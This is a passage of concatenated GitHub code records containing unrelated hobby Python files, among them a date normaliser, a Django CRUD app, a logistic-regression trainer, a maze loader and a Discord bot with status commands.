1, \"we\": 1, \"what\": 1, \"when\": 1, \"where\": 1, \"whether\": 1, \"which\": 1,\n \"whom\": 1, \"whose\": 1, \"who\": 1, \"why\": 1, \"will\": 1, \"with\": 1, \"wouldn\": 1, \"would\": 1}\n\ndef isodate(query, context):\n \"\"\"\n Normalize a variant of \"April 21st, 1970\" into \"1970-04-21\".\n\n This Python snippet is a companion to the date extractor. Dates are extracted\n using regular expressions, and the matching patterns are normalized by means of\n this routine. As such, this routine may have to be somewhat synchronized with\n the date extractor's main configuration file.\n \"\"\"\n\n # Paranoia.\n query = query or \"\"\n context = context or \"\"\n\n # Decompose the meta data, passed as, e.g., \"month2/April/day2/21/year2/1970\".\n meta = context.lower().split('/')\n\n # Set defaults.\n year = \"XXXX\"\n month = \"XX\"\n day = \"XX\"\n\n # Process the meta data. 
Note prefix matching.\n for i in range(0, len(meta), 2):\n if meta[i].startswith(\"year\"):\n year = meta[i + 1]\n if len(year) == 2:\n if year > \"10\":\n year = \"19%s\" % (year)\n else:\n year = \"20%s\" % (year)\n elif meta[i].startswith(\"month\"):\n try:\n month = str(int(meta[i + 1]))\n if len(month) == 1:\n month = \"0\" + month\n except:\n month = _monthmap_3c.get(meta[i + 1][0:3], month)\n if month == \"XX\":\n month = _monthmap_4c.get(unicode(meta[i + 1][0:4], \"utf-8\"), month)\n elif meta[i].startswith(\"day\"):\n day = meta[i + 1]\n if len(day) == 1:\n day = \"0\" + day\n\n # Swap day and month?\n if month != \"XX\" and day != \"XX\":\n if month >= \"13\" and day <= \"13\":\n month, day = day, month\n\n # Format the date according to the ISO 8601 standard.\n date = \"%s-%s-%s\" % (year, month, day)\n\n # Handle special cases, e.g., hardwire \"XXXX-09-11\" to \"2001-09-11\". Ideally, we'd deduce\n # this by looking at other evidence found in the same context as the incoming date.\n if date == \"XXXX-09-11\":\n year = \"2001\"\n date = \"2001-09-11\"\n\n # Return a nicely formatted ISO date as the base form, with the individual date items as meta data.\n return [(0, len(query), date, 255, 0, \"/\".join([\"year\", year, \"month\", month, \"day\", day]))]\n\ndef nlq_quoted(query, context):\n \"\"\"\n Helper method for partial processing of a certain class of natural language queries.\n Please contact Aleksandra Wasiak or Juergen Oesterle for details.\n \"\"\"\n\n query = query or \"\"\n context = context or \"\"\n\n # Rewrite the query to an FQL expression?\n if _nlq1regexp.search(query):\n return [(0, len(query), ''.join(['xml:document:string(\"', _nlq2regexp.sub('', query), '\", mode=\"phrase\")']), 255, 0, context)]\n else:\n return []\n\ndef nlq_stopwords(query, context):\n \"\"\"\n Helper method for partial processing of a certain class of natural language queries.\n Please contact Aleksandra Wasiak or Juergen Oesterle for details.\n \"\"\"\n\n query = query or \"\"\n context = context or \"\"\n\n # Already an FQL expression?\n if not _nlq3regexp.search(query):\n return []\n\n # Simple tokenization.\n terms = _nlq4regexp.split(query)\n \n if not terms:\n return []\n\n # Strip away stopwords.\n return [(0, len(query), \" \".join(filter(lambda x: x not in _nlqstopwords, terms)), 255, 0, context)]\n\ndef _enclosingtags(xml, all):\n \"\"\"\n Internal helper function, invoked by the scopenavigator/2 method below.\n \n Given an XML snippet, locates the highlighted terms and returns a list of scopes\n that includes/encloses these. We can choose to find all enclosing scopes, or just the\n nearest one.\n\n The algorithm first locates the end of a highlighted term. From that offset, we then\n start locating opening or closing tags. Tags that break a certain push/pop pattern must\n necessarily include/enclose the highlighted terms.\n \"\"\"\n\n tags = []\n\n # Iterate over all highlighted terms.\n for match1 in _junregexp1.finditer(xml):\n\n # What offsets does the match span?\n (i, j) = match1.span()\n \n stack = []\n\n # Find all tags that come after the highlighted term.\n for match2 in _junregexp2.finditer(xml[j:]):\n\n tag = match2.groups()[0]\n \n # Is it a closing tag?\n if tag[0] == '/':\n\n # Are we closing something we just opened?\n if stack and (tag[1:] == stack[-1]):\n stack.pop()\n\n # Unexpected pattern encountered. We've found an enclosing tag!\n else:\n tags.append(tag[1:])\n if not all:\n break\n\n # It's an opening tag. 
Booooring!\n else:\n stack.append(tag)\n \n return tags\n\ndef _getregexp(context):\n \"\"\"\n Internal helper function, invoked by the scopenavigator/2 method below.\n\n Returns a regular expression object that can be used for pulling out interesting\n stuff from XML snippets.\n\n The returned regular expression gets cached, so that we avoid recompiling it the next\n time someone asks for it. \n \"\"\"\n\n # Get the precompiled regular expression, if it exists.\n recognizer = _regexpmap.get(context, None)\n\n # No precompiled regular expression object available?\n if not recognizer:\n \n # Create a compiled regular expression object. Handle \"foo\" and \"foo@bar\"\n # specifications.\n try:\n if not \"@\" in context:\n recognizer = re.compile(\"\".join([r\"<\\s*\", context, r\"\\b[^>]*>(.*?)<\\s*/\\s*\", context, r\"\\s*>\"]))\n else:\n (tag, attribute) = context.split(\"@\", 1)\n recognizer = re.compile(\"\".join([r\"<\\s*\", tag, r\"\\s+[^>]*\", attribute, r\"\\s*=\\s*\\\"(.*?)\\\"\"]))\n except:\n return None\n\n # Cache it, to avoid having to recompile it later. We implicitly assume that the set of possible\n # specifications isn't overly large so that memory consumption doesn't grow indefinitely.\n _regexpmap[context] = recognizer\n\n # Done!\n return recognizer\n\ndef scopenavigator(query, context):\n \"\"\"\n This Python snippet is a companion to shallow navigators of type 'dynamic', applied\n to XML fragments returned as matching scopes.\n \"\"\"\n\n matches = []\n\n # Paranoia.\n if not query or not context:\n return matches\n\n # Interpret a \"!\" suffix as a uniqueness specification.\n unique = context.endswith(\"!\")\n\n if unique:\n context = context[:-1]\n added = {}\n \n # Interpret a \"?\" suffix as a highlighting-constraint specification.\n constrained = context.endswith(\"?\")\n\n if constrained:\n context = context[:-1]\n\n # This is only relevant together with a \"*\" specification, see below.\n constrainedall = (constrained and context.endswith(\"?\"))\n\n if constrainedall:\n context = context[:-1]\n\n # Interpret \"star\" type specifications as a means for aggregating over structure instead of content.\n if (context[0] == \"*\"):\n star0 = True\n star1 = (context == \"*\")\n star2 = (context == \"*@*\")\n else:\n star0 = False\n star1 = False\n star2 = False\n\n # Apply the regular expression magic to the XML fragment. Avoid picking up XML envelope tags and other\n # ignorable stuff, if relevant. Note that position information is not needed by the client.\n # Handle \"foo\" and \"foo@bar\" context specifications, possibly constrained. 
Unescape some commonly escaped\n # entities (see ticket 11854 for details).\n if not star0:\n regexp = _getregexp(context)\n if regexp:\n for match in regexp.finditer(query):\n target = match.groups()[0]\n highlighted = (_junbohseq in target) or (_juneohseq in target)\n if constrained and not highlighted:\n continue\n if (\"<\" in target) or highlighted:\n target = _stripregexp.sub(\"\", target)\n if \"&\" in target:\n target = target.replace('&', '&')\n target = target.replace('"', '\"')\n if unique and target in added:\n continue\n matches.append((0, 0, target, 255, 0, context))\n if unique:\n added[target] = 1\n\n # Handle \"*@*\" context specifications.\n elif star2 and not constrained:\n for match1 in _tagregexp1.finditer(query):\n target1 = match1.groups()[0]\n if target1 in _ignoretags:\n continue\n for match2 in _tagregexp2.finditer(match1.groups()[1]):\n target2 = match2.groups()[0]\n target3 = \"@\".join([target1, target2])\n if unique and target3 in added:\n continue\n matches.append((0, 0, target3, 255, 0, context))\n if unique:\n added[target3] = 1\n\n # Handle \"*\" context specifications.\n elif star1 and not constrained:\n for match in _tagregexp3.finditer(query):\n target = match.groups()[0]\n if target in _ignoretags:\n continue\n if unique and target in added:\n continue\n matches.append((0, 0, target, 255, 0, context))\n if unique:\n added[target] = 1\n\n # Handle \"*?\" context specifications.\n elif star1 and constrained:\n for target in _enclosingtags(query, constrainedall):\n if target in _ignoretags:\n continue\n if unique and target in added:\n continue\n matches.append((0, 0, target, 255, 0, context))\n if unique:\n added[target] = 1\n\n # All other context specifications.\n else:\n pass\n\n # Let the client convert the list of all matches into content for a navigator.\n return matches\n","repo_name":"rokhmatpn/nlp","sub_path":"fast_libs/matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":15095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5120566329","text":"import asyncio\nfrom vkbottle import Message\nfrom nicevk.api import user, commands\n\ncommands.append(\".type - just typing the text\")\n\n\n@user.on.message_handler(text=\".type \")\nasync def help_(ans: Message, text: str):\n if not text:\n return await ans.api.messages.edit(\n ans.peer_id, ans.id, \"I need something to type\"\n )\n if \" \" in text: # to prevent messageWasntModified error\n text = text.replace(\" \", \"ᅠ\") # invisible char\n else:\n pass\n\n mes = \"\"\n for char in text:\n mes += \"|\"\n await ans.api.messages.edit(ans.peer_id, ans.id, mes)\n await asyncio.sleep(0.04)\n mes = mes[:-1] + char\n await ans.api.messages.edit(ans.peer_id, ans.id, mes)\n await asyncio.sleep(0.02)\n","repo_name":"nm17/nicevk","sub_path":"nicevk/plugins/type_plugin.py","file_name":"type_plugin.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"23277326578","text":"from strategy.BaseStrategy import Strategy\nfrom strategy.DebugTools import DebugPotentialFieldStrategy\nfrom controller.uni_controller import UniController\nimport math\nimport algorithms\n\n# class MainAttacker(DebugPotentialFieldStrategy):\nclass MainAttacker(Strategy):\n def __init__(self, match, name=\"MainAttacker\"):\n super().__init__(match, name, controller=UniController)\n\n def start(self, robot=None):\n super().start(robot=robot)\n\n self.point = 
algorithms.fields.PotentialField(\n self.match,\n name=\"{}|PointBehaviour\".format(self.__class__)\n )\n\n self.point.add_field(\n algorithms.fields.PointField(\n self.match,\n target = (0.75, 0.65),\n radius = .075,\n decay = lambda x: x,\n multiplier = 1\n )\n )\n\n def reset(self, robot=None):\n super().reset()\n if robot:\n self.start(robot)\n\n def decide(self, x=None, y=None):\n if x:\n self.robot.x = x\n if y:\n self.robot.y = y\n\n behaviour = None\n\n behaviour = self.point\n\n return behaviour.compute([self.robot.x, self.robot.y])\n \n \n","repo_name":"UFRBots/UFRBOTS_PROJECT_NEON","sub_path":"strategy/cbfr2022/mainAttacker.py","file_name":"mainAttacker.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32344832465","text":"import requests\nfrom PIL import Image\nfrom io import BytesIO\nimport os\n\n\nACCESS_KEY=''\nsearchTerm = ''\npath = ''\n\nimage_endpoint = f\"https://api.unsplash.com/photos/random?query={searchTerm}&page=1&per_page=10&orientation=landscape&client_id={ACCESS_KEY}\"\nresponse = requests.get(image_endpoint)\nphoto = response.json()\n\ndownload_location = photo['links']['download_location']\npayload = {'client_id':ACCESS_KEY}\nresponse = requests.get(download_location, payload)\nstatus_code = response.status_code\n\nif status_code == 200:\n image_id = photo['id']\n image_download_url = response.json()['url']\n response = requests.get(image_download_url)\n format = Image.open(BytesIO(response.content)).format # Gets the file type of the image\n filename = f\"{path}/photo.{format}\"\n Image.open(BytesIO(response.content)).save(filename)\n os.system(\"gsettings set org.gnome.desktop.background picture-uri file://\"+filename)\nelse:\n print('download failed', status_code)\n","repo_name":"Mattrcarey/Background_Changer","sub_path":"BackgroundChanger.py","file_name":"BackgroundChanger.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24982382984","text":"from __future__ import unicode_literals\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom .models import User\nfrom django.contrib import messages\nfrom django.contrib.messages import error\n\n# Create your views here.\ndef index(request):\n context = {\n 'users': User.objects.all()\n }\n return render(request,'users/index.html', context)\n\ndef new(request):\n\treturn render(request,'users/new.html')\n\ndef create(request):\n errors = User.objects.basic_validator(request.POST)\n if len(errors):\n for field, message in errors.iteritems():\n error(request, message, extra_tags=field)\n return redirect('/users/new')\n else:\n User.objects.create(first_name=request.POST['first_name'], last_name=request.POST['last_name'], email=request.POST['email'])\n return redirect('/users')\n\ndef show(request, id):\n return render(request,'users/show.html', {\"users\":User.objects.get(id=id)})\n\ndef edit(request, id):\n context = {\n 'users': User.objects.get(id=id)\n }\n return render(request,'users/edit.html', context)\n\ndef update(request, id):\n errors = User.objects.basic_validator(request.POST)\n if len(errors):\n for field, message in errors.iteritems():\n error(request, message, extra_tags=field)\n return redirect('/users/new')\n else:\n updating_user = User.objects.get(id=id)\n updating_user.first_name = request.POST['first_name']\n updating_user.last_name = request.POST['last_name']\n 
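# copy the remaining form field onto the model instance; save() below issues the UPDATE\n        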
updating_user.email = request.POST['email']\n        updating_user.save()\n        return redirect('/users')\n\ndef destroy(request, id):\n    removing_user = User.objects.get(id=id)\n    removing_user.delete()\n    return redirect('/')","repo_name":"py2-10-2017/KevinDunn","sub_path":"week7/semi_restful/apps/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73705189211","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 14 21:17:13 2019\n\n@author: zhaolei\n\"\"\"\n\n'''\nSearching\n'''\nclass SearchMethod():\n    \n    def __init__(self, a):\n        self.list = a\n    \n    '''\n    Binary search\n    a = [1,3,5,7,9,10]\n    Time complexity O(lg n)\n    Space complexity O(1)\n    Binary search: lookups are fast but insertions are slow, which motivates the BST (binary search tree)\n    '''\n    def binarySearch(self, a, key, low, high):\n        if not a:\n            return \"error, a is Null\"\n        if low > high : return -1\n        mid = int((low + high)/2)\n        print(a[mid])\n        if a[mid] == key:\n            return mid\n        elif key < a[mid]:\n            return self.binarySearch(a, key, low, mid-1)\n        else :\n            return self.binarySearch(a, key, mid + 1, high)\n    \n    \n    \n    \nif __name__ == '__main__':\n    a = [1,3,5,7,9,10]\n    p = SearchMethod(a)\n    mid = p.binarySearch(p.list, 3, 0, len(p.list) - 1)\n    print(mid)\n    \n    \n    ","repo_name":"zhlei99/more_and_more_learning","sub_path":"data_structure/SearchMethod.py","file_name":"SearchMethod.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"10699760827","text":"import os\nimport numpy as np\nimport random\n\nrandom.seed(2022)\n\nflag_list = [0, 1, 2, 3, 5, 6, 7, 8]\n# [0, 1, 2\n#  3,    5\n#  6, 7, 8]\n\ntime_list = [0, 1, 2]\n\n# the maze of size 201*201*2\nmaze_cells = np.zeros((201, 201, 2), dtype=int)\n\n# load maze\ndef load_maze():\n    file_path = \"maze/COMP6247Maze20212022.npy\"\n    if not os.path.exists(file_path):\n        raise ValueError(\"Cannot find %s\" % file_path)\n\n    else:\n        global maze_cells\n        maze = np.load(file_path, allow_pickle=False, fix_imports=True)\n        maze_cells = np.zeros((maze.shape[0], maze.shape[1], 2), dtype=int)\n        for i in range(maze.shape[0]):\n            for j in range(maze.shape[1]):\n                maze_cells[i][j][0] = maze[i][j]\n                # load the maze, with 1 denoting an empty location and 0 denoting a wall\n                maze_cells[i][j][1] = 0\n                # initialized to 0 denoting no fire\n        return maze\n\n# get local 3*3 information centered at (x,y).\ndef get_local_maze_information(x, y):\n    global maze_cells\n    random_location = random.choice(flag_list)\n    around = np.zeros((3, 3, 2), dtype=int)\n    for i in range(maze_cells.shape[0]):\n        for j in range(maze_cells.shape[1]):\n            if maze_cells[i][j][1] == 0:\n                pass\n            else:\n                maze_cells[i][j][1] = maze_cells[i][j][1] - 1  # decrement the fire time\n\n    for i in range(3):\n        for j in range(3):\n            if x - 1 + i < 0 or x - 1 + i >= maze_cells.shape[0] or y - 1 + j < 0 or y - 1 + j >= maze_cells.shape[1]:\n                around[i][j][0] = 0  # this cell is outside the maze, and we set it to a wall\n                around[i][j][1] = 0\n                continue\n            around[i][j][0] = maze_cells[x - 1 + i][y - 1 + j][0]\n            around[i][j][1] = maze_cells[x - 1 + i][y - 1 + j][1]\n            if i == random_location // 3 and j == random_location % 3:\n                if around[i][j][0] == 0:  # this cell is a wall\n                    continue\n                ran_time = random.choice(time_list)\n                around[i][j][1] = ran_time + around[i][j][1]\n                maze_cells[x - 1 + i][y - 1 + j][1] = around[i][j][1]\n    return 
around\n","repo_name":"Resh-97/Dynamic_Maze_Solving","sub_path":"maze/read_maze.py","file_name":"read_maze.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"27300606339","text":"\ndef one():\n for i in range(1 , 100):\n print(str(i))\n\n\ndef fa(b):\n if b == 1 :\n return 1\n else:\n return b*fa(b-1)\n\n\n\n\n\n\n\n\ndef zoj(n):\n if n%2 == 0 :\n print( \"z\")\n\n\n\n\n\n else:\n print(\"f\")\n\nif __name__ == '__main__':\n print(fa (5))\n\n\n\n\n\n\n","repo_name":"zehramian/zfolder","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22650871397","text":"# Errors and Exceptions \n\n'''Errors and exceptions will be commented out in order to not raise exceptions during run time.\nRemove the comments to try the code at runtime.'''\n\n'''You can raise an exception in Python when a certain condition is met.\nx = -5 \nif x < 0:\n raise Exception('x should be a positive number')'''\n\n'''You can also use an assert statement to throw an error is your assertion is not true.\nx = -5\nassert(x >= 0), 'x is not a positive number'\n'''\n\n'''You can also do a try/except block. This will try a block of code and raise an exception if the \ncode fails at run time.'''\ntry:\n a = 5 / 0\nexcept:\n print('An error occurred. You cannot divide by zero.')\n\n# You can do the same thing using the built-in error handling.\ntry:\n a = 5 / 0\nexcept Exception as e:\n print(e)\n\n# If you know what the error type is you can just put it directly into the code.\ntry:\n a = 5 / 0\nexcept ZeroDivisionError:\n print('You cannot divide by zero.')\n\ntry:\n a = 6\n b = a + '10'\nexcept TypeError as f:\n print(f)\n\n# You may also add an else clause to your try/except block in case no error occurred.\ntry:\n a = 6\n b = a + 10\nexcept TypeError as f:\n print(f)\nelse:\n print('Looking good!')\n\n# You may also add a finally clause, which runs whether there was an exception or not.\ntry:\n a = 6\n b = a + 10\nexcept TypeError as f:\n print(f)\nelse:\n print('Looking good!')\nfinally:\n print('Cleaning up...')\n\ntry:\n a = 6\n b = a + '10'\nexcept TypeError as f:\n print(f)\nelse:\n print('Looking good!')\nfinally:\n print('Cleaning up...')\n\n# You may also define your own exception by defining an Error class via subclassing from the base Exception class.\nclass ValueTooHighError(Exception):\n pass\n\ndef test_value(x):\n if x > 100:\n raise ValueTooHighError('The value is too high.')\n# Remove the hash below to test this function.\n# test_value(200)\n\n# You may also add this function to a try/except block.\ntry:\n test_value(200)\nexcept ValueTooHighError as y:\n print(y)\n\n'''You'll want to keep your Error classes small but useful. Let's try one more, but we'll make it opreate a bit differently this time. 
\nAgain, the base class will be the Exception class.'''\nclass ValueTooSmallError(Exception):\n    def __init__(self, message, value):\n        self.message = message\n        self.value = value\n\ndef test_value_2(x):\n    if x < 5:\n        raise ValueTooSmallError('The value is too small:', x)\n\ntry:\n    test_value_2(1)\nexcept ValueTooSmallError as y:\n    print(y.message, y.value)\n# As you can see, the message was printed along with the value.\n","repo_name":"mrichinfinite/scratchy","sub_path":"scratch/scratch2/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"11181020571","text":"import matplotlib.pyplot as plt\nfrom skimage.segmentation import slic\nfrom skimage.segmentation import mark_boundaries\n#from skimage.segmentation import get_mean_colors\nfrom skimage.util import img_as_float\nfrom skimage import io\nimport numpy as np\n\n#pylab inline\n#matplotlib inline \n\ndef get_mean(img, indic):\n\tindica = img*indic\n\tn = indic.sum()\n\treturn int(indica.sum()*1.0/n)\n\nimg = img_as_float(io.imread('f1.JPEG'))\nio.imshow(img);\nimga = np.zeros(img.shape, dtype = 'uint8')\n\ncount =0\n\n\n\nsegments = slic(img, n_segments = 10, compactness = 10, sigma = 1)\nfor v in np.unique(segments):\n\tprint(count)\n\tcount += 1\n\t# construct a mask for the segment\n\t# print \"[x] inspecting segment %d\" % (i)\n\tindic = np.zeros(img.shape, dtype = \"uint8\")\n\tindic[segments == v] = 1\n\timga[segments == v] = get_mean(img, indic)\n\nio.imshow(imga);\nfig = plt.figure(figsize=(12,4))\nax = fig.add_axes([0, 0, 1, 1])\nax.imshow(mark_boundaries(img, segments)) \nplt.show()\n\n#50, 100, 300, 500, 1000","repo_name":"plasmatiger/Adversary_ML","sub_path":"slicavg.py","file_name":"slicavg.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24744452668","text":"import os, sys\nimport numpy as np\nfrom random import shuffle\nfrom math import log, floor\nimport pandas as pd\n\n\n# Loads the training and test data\ndef load_data(train_data_path, train_label_path, test_data_path):\n    X_train = pd.read_csv(train_data_path, sep=',', header=0)\n    X_train = np.array(X_train.values)\n    Y_train = pd.read_csv(train_label_path, sep=',', header=0)\n    Y_train = np.array(Y_train.values)\n    X_test = pd.read_csv(test_data_path, sep=',', header=0)\n    X_test = np.array(X_test.values)\n    return (X_train, Y_train, X_test)\n\n\n# Shuffles the order of the training data\ndef _shuffle(X, Y):\n    randomize = np.arange(len(X))\n    np.random.shuffle(randomize)\n    return (X[randomize], Y[randomize])\n\n\n# Normalizes the features of the training and test data\ndef normalize(X_all, X_test):\n    # Concatenate the training and test sets, then normalize\n    X_train_test = np.concatenate((X_all, X_test))\n    mu = (sum(X_train_test) / X_train_test.shape[0])\n    sigma = np.std(X_train_test, axis=0)\n    mu = np.tile(mu, (X_train_test.shape[0], 1))\n    sigma = np.tile(sigma, (X_train_test.shape[0], 1))\n    X_train_test_normed = (X_train_test - mu) / sigma\n\n    # After normalization, split the data back into training and test sets\n    X_all = X_train_test_normed[0:X_all.shape[0]]\n    X_test = X_train_test_normed[X_all.shape[0]:]\n    return X_all, X_test\n\n\n# Splits the training set into a training subset and a validation subset used for model selection\ndef split_valid_set(X_all, Y_all, percentage):\n    all_data_size = len(X_all)\n    valid_data_size = int(floor(all_data_size * percentage))\n    X_all, Y_all = _shuffle(X_all, Y_all)\n    X_train, Y_train = X_all[0:valid_data_size], Y_all[0:valid_data_size]\n    X_valid, Y_valid = X_all[valid_data_size:], Y_all[valid_data_size:]\n    return X_train, 
Y_train, X_valid, Y_valid\n\n\n# Define the sigmoid function\ndef sigmoid(z):\n    res = 1 / (1.0 + np.exp(-z))\n    return np.clip(res, 1e-8, 1 - (1e-8))\n\n\n# Evaluate the model on the validation set\ndef valid(w, b, X_valid, Y_valid):\n    valid_data_size = len(X_valid)\n\n    z = (np.dot(X_valid, np.transpose(w)) + b)\n    y = sigmoid(z)\n    y_ = np.around(y)\n    result = (np.squeeze(Y_valid) == y_)\n    return y_\n\n\ndef train(X_all, Y_all, save_dir):\n    # Hold out 10% of the training set for model selection\n    valid_set_percentage = 0.1\n    X_train, Y_train, X_valid, Y_valid = split_valid_set(X_all, Y_all, valid_set_percentage)\n    # Initialize the parameters and set the learning rate, number of epochs, and batch size\n    w = np.zeros((16,))\n    b = np.zeros((1,))\n    l_rate = 0.1\n    batch_size = 32\n    train_data_size = len(X_train)\n    step_num = int(floor(train_data_size / batch_size))\n    epoch_num = 10000\n    save_param_iter = 2000\n    total_loss = 0.0\n    # Start training\n    for epoch in range(1, epoch_num):\n        # Randomly shuffle the training set\n        X_train, Y_train = _shuffle(X_train, Y_train)\n        # Train on one batch of batch_size samples at a time\n        for idx in range(step_num):\n            X = X_train[idx * batch_size:(idx + 1) * batch_size]\n            Y = Y_train[idx * batch_size:(idx + 1) * batch_size]\n            z = np.dot(X, np.transpose(w)) + b\n            y = sigmoid(z)\n            cross_entropy = -1 * (np.dot(np.squeeze(Y), np.log(y)) + np.dot((1 - np.squeeze(Y)), np.log(1 - y)))\n            total_loss += cross_entropy\n            w_grad = np.sum(-1 * X * (np.squeeze(Y) - y).reshape((batch_size, 1)), axis=0)\n            b_grad = np.sum(-1 * (np.squeeze(Y) - y))\n            # Update the parameters by gradient descent\n            w = w - l_rate * w_grad\n            b = b - l_rate * b_grad\n            print(w)\n            print(b)\n            print('+ = ' * 20)\n        # Validate the model and save the parameters\n        if epoch % save_param_iter == 0:\n            print('=====Saving Param at epoch %d=====' % epoch)\n            if not os.path.exists(save_dir):\n                os.mkdir(save_dir)\n            np.savetxt(os.path.join(save_dir, 'w'), w)\n            np.savetxt(os.path.join(save_dir, 'b'), [b, ])\n\n            print('epoch avg loss = %f' % (total_loss / (float(save_param_iter) * train_data_size)))\n            total_loss = 0.0\n            valid(w, b, X_valid, Y_valid)\n\n\n# Run the test data through the model and write out the predictions\ndef infer(X_test, save_dir, output_dir):\n    test_data_size = len(X_test)\n\n    # Load the learned parameters w and b\n    print('=====Loading Param from %s=====' % save_dir)\n    w = np.loadtxt(os.path.join(save_dir, 'w'))\n    b = np.loadtxt(os.path.join(save_dir, 'b'))\n\n    # Apply w and b to the test set to obtain predictions\n    z = (np.dot(X_test, np.transpose(w)) + b)\n    y = sigmoid(z)\n    y_ = np.around(y)\n\n    print('=====Write output to %s =====' % output_dir)\n    if not os.path.exists(output_dir):\n        os.mkdir(output_dir)\n    output_path = os.path.join(output_dir, 'log_prediction.csv')\n    with open(output_path, 'w') as f:\n        f.write('id,label\\n')\n        for i, v in enumerate(y_):\n            f.write('%d,%d\\n' % (i + 1, v))\n    return\n\n\ndef AUC(label, pre):\n    # Collect the indexes of positive and negative samples so their scores can be compared\n    pos = [i for i in range(len(label)) if label[i] == 1]\n    neg = [i for i in range(len(label)) if label[i] == 0]\n    auc = 0\n    for i in pos:\n        for j in neg:\n            if pre[i] > pre[j]:\n                auc += 1\n            elif pre[i] == pre[j]:\n                auc += 0.5\n    return auc / (len(pos) * len(neg))\n\n\nif __name__ == \"__main__\":\n    method = 'preprocess'\n    if method == 'preprocess':\n        data = pd.read_csv(\"train.csv\")\n        print(data.shape)\n        data = data.fillna(-1)\n        data.drop(labels=['Date', 'Location', 'WindDir9am', 'WindSpeed3pm', 'WindGustDir',], axis=1, inplace=True)\n        data.drop(labels=['WindDir3pm'], axis=1, inplace=True)\n        print(data.shape)\n        data.RainTomorrow = data.RainTomorrow.map({'No': 0, 'Yes': 1})\n        data.RainToday = data.RainToday.map({'No': 0, 'Yes': 1, 'nan': -1})\n\n        dataTest = pd.read_csv(\"test.csv\")\n        print(dataTest.shape)\n        dataTest = dataTest.fillna(-1)\n        dataTest.drop(labels=['Date', 'Location', 'WindDir9am', 'WindSpeed3pm', 'WindGustDir',], 
axis=1, inplace=True)\n dataTest.drop(labels=['WindDir3pm'], axis=1, inplace=True)\n print(dataTest.shape)\n dataTest.RainToday = dataTest.RainToday.map({'No': 0, 'Yes': 1, 'nan': -1})\n Y_all = np.array(data['RainTomorrow'].values)\n del data['RainTomorrow']\n X_all = np.array(data.values)\n X_test = np.array(dataTest.values)\n print(X_all.shape, Y_all.shape, X_test.shape)\n\n train(X_all, Y_all, './results')\n infer(X_test, './results', './results')","repo_name":"Alvin2580du/alvin_py","sub_path":"business/p201908/700/tmp2.py","file_name":"tmp2.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"43341374840","text":"import tranu.shared.font\nimport tranu.tpyglet.colors\nimport pyglet\n\n\nclass TFont(tranu.shared.font.SharedFont):\n\n def __init__(self, size):\n super().__init__(size)\n\n self._family = \"Arial\"\n self._label = None\n\n def load(self, path, sysfont=True):\n self._label = pyglet.text.Label(font_name=path, font_size=self._size)\n\n def draw(self, window, text, x, y, color=tranu.tpyglet.colors.RED):\n self._label.text = text\n self._label.x = x\n self._label.y = window.height - y\n self._label.color = (*color, 255) if len(color)==3 else color\n\n self._label.draw()\n","repo_name":"matimar94/tranu","sub_path":"tpyglet/font.py","file_name":"font.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9914896839","text":"import discord\r\n# import os\r\nfrom discord.ext import commands\r\n# from keep_alive import keep_alive\r\nimport random\r\n\r\nclass Config:\r\n\r\n token = 'Put your token here'\r\n prefix = ';;'\r\n\r\n\r\nintents = discord.Intents.all()\r\nclient = commands.Bot(command_prefix=Config.prefix, intents=intents)\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n print('IM ONLINE')\r\n\r\n\r\n@client.command()\r\nasync def cmd(ctx):\r\n colors = [0x00FF00, 0xFF0000, 0x0000FF, 0x00CECE]\r\n titles = [\"(●'◡'●)\", \"(❁´◡`❁)\", \"༼ つ ◕_◕ ༽つ\", \"(☞゚ヮ゚)☞\" , \"☜(゚ヮ゚☜)\" , \"(⌐■_■)\"]\r\n my_embed = discord.Embed(\r\n title=random.choice(titles),\r\n colour=random.choice(colors)\r\n )\r\n await ctx.send(embed=my_embed)\r\n\r\n\r\n@client.command()\r\nasync def greet(ctx):\r\n mention = ctx.author.mention\r\n await ctx.send(f'>>> Salam {mention}...Chekhabar??')\r\n\r\n\r\n@client.command()\r\nasync def setstatus(ctx, status_type):\r\n if status_type == 'idle':\r\n await client.change_presence(status=discord.Status.idle)\r\n await ctx.send(f'>>> Im Idle')\r\n elif status_type == 'dnd':\r\n await client.change_presence(status=discord.Status.dnd)\r\n await ctx.send(f'>>> Im Busy!!!')\r\n elif status_type == 'offline':\r\n await client.change_presence(status=discord.Status.offline)\r\n await ctx.send(f'>>> GOOD BYE!!!')\r\n else:\r\n await client.change_presence(status=discord.Status.online)\r\n await ctx.send(f'>>> Amade be anjam dasturat.!')\r\n\r\n\r\n@client.command()\r\nasync def setactivity(ctx, activity_type, *, activity_text):\r\n if activity_type == 